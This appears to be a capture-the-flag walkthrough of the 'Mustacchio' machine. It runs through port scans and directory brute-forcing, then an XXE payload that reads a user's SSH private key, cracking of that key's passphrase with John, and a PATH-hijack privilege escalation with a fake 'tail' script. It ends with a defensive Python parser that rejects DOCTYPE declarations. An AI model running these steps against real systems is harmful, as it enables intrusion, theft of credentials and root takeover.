Mustacchio
Initial Scan
nmap -A $VICTIM
Scan all ports

TCP/80 - HTTP




TCP/8765 - HTTP



Initial Shell








Privilege Escalation


nmap -sV -sT -O -p 1-65535 $VICTIM

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

gobuster dir -u http://$VICTIM:8765 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Username: admin
Password: bulldog19

<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could\u2019ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could\u2019ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>

python /opt/john/ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
chmod 600 id_rsa
ssh -v -i id_rsa barry@$VICTIM
Password: urieljames

cd /home/joe
ls -lah
strings live_log

cd /tmp
cat > tail << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
chmod +x tail
export PATH=/tmp/:$PATH
/home/joe/live_log
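
The XXE request above only returns the key file because the server's XML parser accepts a DOCTYPE and resolves the external entity it declares. The following is an added example, not code from the original writeup or from the target application: a comment parser that rejects any DOCTYPE before entity declarations are processed, run against the payload shown above and a constructed benign comment. The names parse_comment, is_rejected and DTDForbidden are hypothetical.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a submitted document carries a DOCTYPE declaration."""


def parse_comment(xml_bytes: bytes) -> dict:
    """Return the child fields of <comment>, refusing any DOCTYPE (and so any entity)."""
    fields, stack, buf = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any <!ENTITY ...> in the subset is processed.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in comments")

    def on_start(name, attrs):
        stack.append(name)
        buf.clear()

    def on_end(name):
        if len(stack) == 2:  # direct child of the root element
            fields[name] = "".join(buf).strip()
        stack.pop()
        buf.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = buf.append
    parser.Parse(xml_bytes, True)
    return fields


def is_rejected(xml_bytes: bytes) -> bool:
    """True when the document is refused because it declares a DTD."""
    try:
        parse_comment(xml_bytes)
    except DTDForbidden:
        return True
    return False


# Constructed benign input, shaped like the sample comment on this page.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<comment><name>Joe Hamd</name><author>Barry Clad</author>'
          b'<com>constructed sample text</com></comment>')
# The payload from this page, reused to show it is refused.
XXE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
       b"<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>\n"
       b'<comment><name>Joe Hamd</name><author>Barry Clad</author>'
       b'<com>&xxe;</com></comment>')
```

Rejecting the DOCTYPE outright also covers internal-entity expansion attacks, since no entity can be declared without one.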